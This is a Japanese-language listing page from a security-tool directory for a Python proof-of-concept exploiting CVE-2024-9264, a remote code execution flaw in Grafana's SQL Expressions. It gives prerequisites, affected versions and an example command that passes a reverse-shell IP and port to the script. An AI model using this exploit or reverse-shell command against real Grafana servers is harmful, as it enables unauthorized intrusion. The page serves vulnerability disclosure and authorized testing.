Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9264 — Python製の概念実証コード。GrafanaのSQL Expressionsを介したリモートコード実行を実証し、不十分な入力サニタイズを悪用して、認証済みターゲット上で任意のシェルコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/royall-researchers/cve-2024-9264
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubroyall-researchers/cve-2024-9264

CVE-2024-9264

Python製の概念実証コード。GrafanaのSQL Expressionsを介したリモートコード実行を実証し、不十分な入力サニタイズを悪用して、認証済みターゲット上で任意のシェルコマンドを実行します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

GrafanaのSQL Expressionsを介したCVE-2024-9264-RCEエクスプロイト

説明

Grafanaにおけるリモートコード実行(RCE)の概念実証 (CVE-2024-9264)

このリポジトリは、GrafanaのSQL Expressions機能におけるリモートコード実行(RCE)脆弱性を悪用するPythonスクリプトを含んでいます。不十分な入力サニタイズを利用することで、このエクスプロイトは攻撃者がサーバー上で任意のシェルコマンドを実行することを可能にします。これはshellfsコミュニティ拡張機能を通じて可能になり、攻撃者はこの拡張機能をインストールしてロードすることでコマンド実行を容易にできます。

前提条件

  • Viewer権限以上の認証されたGrafanaユーザー
  • DuckDBバイナリがインストールされ、GrafanaのPATHからアクセス可能であること

影響を受けるバージョン

Grafana >= v11.0.0 (v11.x.yのすべてが影響を受けます)

使用法

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

例

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

免責事項

このスクリプトは教育目的およびシステムのセキュリティをテストする許可がある管理された環境での使用を意図しています。このツールの誤用は法的な結果を招く可能性があります。

詳細情報

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

ツールをダウンロード